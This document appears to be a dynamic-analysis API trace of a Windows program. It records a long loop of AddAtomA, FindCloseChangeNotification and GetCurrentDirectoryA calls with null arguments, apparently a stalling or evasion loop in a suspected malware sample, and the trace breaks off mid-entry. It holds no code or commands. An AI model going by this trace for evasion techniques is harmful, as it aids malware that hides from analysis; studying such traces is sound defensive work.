[0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.117] AddAtomA (lpString=0x0) returned 0x0 [0129.117] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.117] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.118] AddAtomA (lpString=0x0) returned 0x0 [0129.118] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.118] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.119] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.119] AddAtomA (lpString=0x0) returned 0x0 [0129.119] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.120] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.120] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.120] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.120] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.120] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.120] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.120] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.121] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.121] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.121] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.121] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.121] AddAtomA (lpString=0x0) returned 0x0 [0129.121] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.121] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.122] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.122] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.122] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.122] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.122] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.122] AddAtomA (lpString=0x0) returned 0x0 [0129.122] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.123] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.123] AddAtomA (lpString=0x0) returned 0x0 [0129.123] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.123] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.123] AddAtomA (lpString=0x0) returned 0x0 [0129.123] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.123] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.123] AddAtomA (lpString=0x0) returned 0x0 [0129.123] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.123] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.123] AddAtomA (lpString=0x0) returned 0x0 [0129.123] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.123] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.123] AddAtomA (lpString=0x0) returned 0x0 [0129.124] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.124] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.124] AddAtomA (lpString=0x0) returned 0x0 [0129.124] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.124] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.124] AddAtomA (lpString=0x0) returned 0x0 [0129.124] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.124] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.124] AddAtomA (lpString=0x0) returned 0x0 [0129.124] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.124] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.124] AddAtomA (lpString=0x0) returned 0x0 [0129.124] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.125] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.125] AddAtomA (lpString=0x0) returned 0x0 [0129.125] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.126] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.126] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.126] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.126] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.126] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.126] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.126] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.127] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.127] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.127] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.127] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.127] AddAtomA (lpString=0x0) returned 0x0 [0129.127] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.127] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.128] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.128] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.128] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.128] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.128] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.128] AddAtomA (lpString=0x0) returned 0x0 [0129.128] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.129] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.129] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.129] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.129] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.129] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.129] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.129] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.130] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.130] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.130] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.130] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.130] AddAtomA (lpString=0x0) returned 0x0 [0129.130] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.130] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.131] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.131] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.131] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.131] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.131] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.131] AddAtomA (lpString=0x0) returned 0x0 [0129.131] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.132] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.132] AddAtomA (lpString=0x0) returned 0x0 [0129.132] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.133] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.133] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.133] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.133] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.133] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.133] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.133] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.134] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.134] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.134] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.134] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.134] AddAtomA (lpString=0x0) returned 0x0 [0129.134] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.134] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.135] AddAtomA (lpString=0x0) returned 0x0 [0129.135] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.135] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.136] AddAtomA (lpString=0x0) returned 0x0 [0129.136] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.136] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: 